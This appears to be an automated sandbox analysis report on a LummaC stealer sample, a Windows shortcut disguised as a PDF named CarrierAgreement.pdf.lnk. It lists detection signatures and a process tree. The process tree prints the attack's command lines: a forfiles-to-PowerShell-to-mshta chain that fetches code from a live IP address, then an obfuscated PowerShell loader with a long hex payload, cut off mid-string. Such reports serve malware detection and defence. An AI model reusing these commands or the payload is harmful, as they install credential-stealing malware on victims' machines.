Windows
Analysis Report
CarrierAgreement.pdf.lnk.mal.lnk
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
forfiles.exe (PID: 7508 cmdline:
"C:\Window s\System32 \forfiles. exe" /p C: \Windows / m win.ini /c "powers hell . msh ta http:// 92.118.112 .135/carri eragreemen t" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E) conhost.exe (PID: 7516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7568 cmdline:
. mshta ht tp://92.11 8.112.135/ carrieragr eement MD5: 04029E121A0CFA5991749937DD22A1D9) mshta.exe (PID: 7672 cmdline:
"C:\Window s\system32 \mshta.exe " http://9 2.118.112. 135/carrie ragreement MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) powershell.exe (PID: 7840 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction aaTy nIUh($PiQE ){return - split ($Pi QE -replac e '..', '0 x$& ')};$V uCCamL = a aTynIUh('E 5A55824D9E AF8A8C3514 E39CEDEF30 B918A2A158 9DF287752B 8D027F1DFB F83EE12DB0 88588624EC 45E743D432 DCA79C93A7 1346B47500 8579989A09 F5D98E1D33 138882FF47 5A777BFA37 4EB0BFD6A0 B25AA253A0 5AF641E20F 4C77FC5CD0 BE786B5EAA 1F37060C9B 9C4DA610AB A833E1A608 F90B5E6B8D 0C72A052CE 081AB6CEF4 890ABA76C1 939DBFDD7F C25ACC315B BF81EE00ED 5787C37F8E C15BBBDC95 34009AE0B1 FAA407C742 099126C7FD 0D4FE48ED2 39BE661785 C96903D2AE D48751F6A3 2EA8FFA5B2 59E531FDE2 EBF9593420 27F3F21889 F4103EF932 80E2115E8B CEF81D14F8 F1D89FF8A4 75B2F2B676 7EDC2491A1 88CC66BF8A 2D116BBD2E DADACC2568 D9E03C1330 B480BB2424 2F43AF3089 90B03DE246 5DE44C087B 8FDB79C273 0BDA7EF870 1F2098485D EDB88534CE B321A754FA F5DFF2DFCE 6F9109288B E3A78B858A 0BAED175DE 2205F8F173 99B26D860E F1D36E3198 89DDF54024 D57413E8ED 3BEE8124C9 9DC0646E86 AF2E54A5DE BC68B17BE7 F7790E239C C228925080 2915B60ED5 7ECB3427EA A9BE75B0D8 11C4C5B5A1 BC67E8A4E5 62AF8BB426 F451AD0375 6F2DA6C85F D25754E212 64E99ADB5C BE785D577D F55A5CFC65 B2968F7374 77CC6D303C 6B6AE4ADD6 B71C05EF67 DE56A89B19 59E503669C 7B27D1EB3E B0609B8D7F 9D259D9858 07288297EF EF04CF7B98 A19BBE5FEB F808E5D0B1 5E790F4443 1D0F52E70C 27ECA747B9 168AACC8B7 730C50B98B 31A5E95CF4 3E58AB8DA6 BF46550035 D830DBF8CE 8A450849D0 9E26102082 0A3C898AC6 BC7CA58999 4D1A7BC6CB B01495D1CA 57D60B1E68 AF9D1E53C5 BD5310153F C3E2B8DFD9 D910AA312B C6C305AA7D E3E6C1D168 9D0E1B54EC BA688DB697 7B50F8ADB1 C843896B61 9A4C1C88BC 05BA171BAF 12FB0751D9 425C26258C BB29B82CA9 64FDCFBB77 9D338C140E 4B54AD4731 09871DA665 A1028B5489 F2936C002C 23995EAAD7 5FAEC7D1C2 3658D72E5B CA801DBF50 A83D1585FB 03487AACBE 213CBFBAF5 4DDF43E0CC 1780607030 370FD254E6 D185EC019B ED40DF3A26 364E22144A 3A2AB186D0 6DF0AF4FE3 5CA93D0591 5D6D6D7D3C 7A54F25E18 421320862C E1CC9B0C7B 510C13A30A 01950668FE 380F154C13 3E73AB0E0C 92A044F366 9BE276DD74 5D22014967 5000E09D63 EE96087940 9BFEDEDA34 83BC107925 7FCEC92518 331731EBF0 9B0068461A 60C6FE5450 A668155187 769B3714F8 674259AE23 83B26BFC04 7B3345B4B1 A2E81BC4AC C879B28264 1BEA83118B D16A91C3FB 040349F9A2 20F52F0A90 4E971C68A8 B7AE7F5860 034B22033F 31CAF74B12 1D6F0672ED F133C9764C F0B79274AD A57554D561 7BDEB924FD D1A69B7BCA 18D34E108B 89C42EAF96 0A2FE309D5 0F3E17C6EC 586E0EF464 6E2D418053 C151C42EA1 E041F414D9 4AAEC7DCA3 D6086FEFF2 D608A4D5DE A1B781AEA3 109FCF4EF6 0DBA03DCB6 49FE16896B 50AED1F8D5 319155B11B 14787101FA 727118B88D 50589B7420 6D84CD45A5 FFF0653B0D C3265B9218 6DA8EAE07E 65D0B6F1F9 5624219311 75ADCDB834 6280E92044 D6DF6C3D7D 6C52C1B096 1211A8CD21 38E79D9387